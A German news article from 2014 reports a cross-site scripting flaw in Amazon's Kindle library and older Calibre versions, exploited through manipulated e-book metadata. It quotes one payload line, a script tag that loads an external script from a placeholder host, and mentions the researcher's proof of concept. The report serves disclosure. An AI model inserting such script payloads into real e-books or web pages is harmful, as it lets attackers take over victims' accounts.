Cross-Site-Scripting

Sicherheitslücke beim E-Book-Reader Kindle

von - 16.09.2014
Sicherheitslücke beim E-Book-Reader Kindle
Foto: Amazon
Schwere Sicherheitslücke im E-Book-Reader Kindle: Angreifer können über die Kindle-Bibliothek auf der Amazon-Website vollen Zugriff auf das Kundenkonto des Opfers erlangen.
Amazons E-Book-Reader Kindle hat ein Sicherheitsleck. Angreifer erhalten über manipulierte E-Books vollen Zugriff auf das Amazon-Konto der Kindle-Leser. Der Trick: Die Hacker platzieren in den Metadaten des E-Books, also beispielsweise im Buchtitel, einen Skriptaufruf folgenden Formats:
<script src="https://www.example.org/script.js"></script>
Ruft der Kindle-Besitzer nun die Kindle-Bibliothek auf der Amazon-Website auf, dann wird das Skript ausgeführt und der Angreifer erhält Zugriff auf das Benutzerkonto des Kunden.

Sicherheitslücke betrifft auch Calibre

Benjamin Daniel Mussler beschreibt die Sicherheits-Lücke sehr detailliert in seinem Blog und stellt dort auch ein entsprechend präpariertes E-Book als Proof of Concept zum Download bereit. Seiner Aussage zu Folge sind alle Kindle-Besitzer von dieser Sicherheitslücke betroffen, die mit der Kindle-Bibliothek von Amazon arbeiten.
Die Gefahr besteht vor allem, wenn Kindle-Besitzer beispielsweise E-Books im MOBI-Format aus anderen Quellen auf ihren E-Book-Reader laden. Kunden, die ihre Bücher ausschließlich über Amazon beziehen, sollten hingegen sicher sein vor derartigen Angriffen.
Bemerkenswert: Laut Mussler ist nicht nur Amazon für derartige Attacken per Cross-Site-Scripting (XSS) anfällig. Mit den manipulierten E-Books ließen sich in älteren Versionen der beliebten Software Calibre, mit der viele Leser ihre E-Books verwalten, ebenfalls Skripts ausführen. Erst ab Version 1.80 tritt das Problem in Calibre nicht mehr auf. Wer also noch eine ältere Version der Buchverwaltung nutzt, der sollte umgehend updaten.
Verwandte Themen